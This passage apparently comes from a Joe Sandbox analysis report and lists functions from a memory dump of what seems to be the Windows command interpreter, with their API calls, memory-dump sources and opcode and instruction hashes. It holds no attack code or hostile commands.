                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1161012917-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: daf80950beb1043322d9fa17f390b790dea28a53ca9d892c781e8040cd5e4b3a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E91AF22B0965B8AFB44BB60E8101BDBAA0AF49B54FD44137DE1F437B5DFBCA4458320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1512220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d06bda58d5936ec44723525529da0c5511e0d0ed3408dbc22683ddf25e37914
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F19E3260878B8AFB65EB21D8402ADB7A0FB45784FD14136DA4F476A5DFBCE584C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AA85
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AACF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AAEC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB39
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB6F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABA4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABCB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1019019434-1087296587
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8fb77bad9584ca93ec105d2df31bbd5af209357f67f98025750866cf4ee8d376
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5519331B0879B86F760BF25A45076EBA91FB89790FD44236CA4E837A0DFBDD4418710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1514A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$FullNamePathwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4289998964-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c9ece6f7e8188a989f984681316fe21f62332bd2af67ce3b7f9bcd36dcf999f9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BC1AD22A0975F82FF95BB52954837DA2A0FF45B90FD15532CA0F077E1EFBCA4918260
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1513D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %9d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1006866328-2241623522
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 01681a01fe61361d0aad856ab2a527bb2e8c347cf664452ba7c0c66cddef2146
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9514B72A1874B8AF700AF21D8501ACB7A0FB44764FC14636EA6B537B1CFBCE5458B60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2081463915-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5f0f9fde0766a32344fe05ab7abfab6a12cbe1256ccf7d05b5b8ee0778a6fda9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3716621E0824F85FB66BB24A8582BDB2A0AF01754FD5053BE91F426B1DFFCE4918270
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15202A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 840959033-3627297882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c7bbdf72d37530d9f0addba3914115681a45449b97e967dd01a61ce2ddc695b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99D17B22A0864BC6FB54BF21E8452BDB6A0AF54B44FD48077D90F862B6DFBCE4458770
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15132B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15132F3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7D15132A4), ref: 00007FF7D1513309
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D1513384
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D15311DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 611521582-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f588b637ceb8584a5a3c843e496a3cb18b48463ca98d7947242cb60a69081c6b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AA1D022B08A1B86FB54AB61E8542BCFBA1FB49B55FC54036CE0F47764DFBCA445C620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15226E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile_open_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2905481843-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: baec084f93eb42b80639e28b01365cb2f932dcbdedb91a91eb075f84ef16130e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD71743660869A8AF7609F14E44027DFAA0FB45B61FD44236DA5F827B4DF7CD445CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1541A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
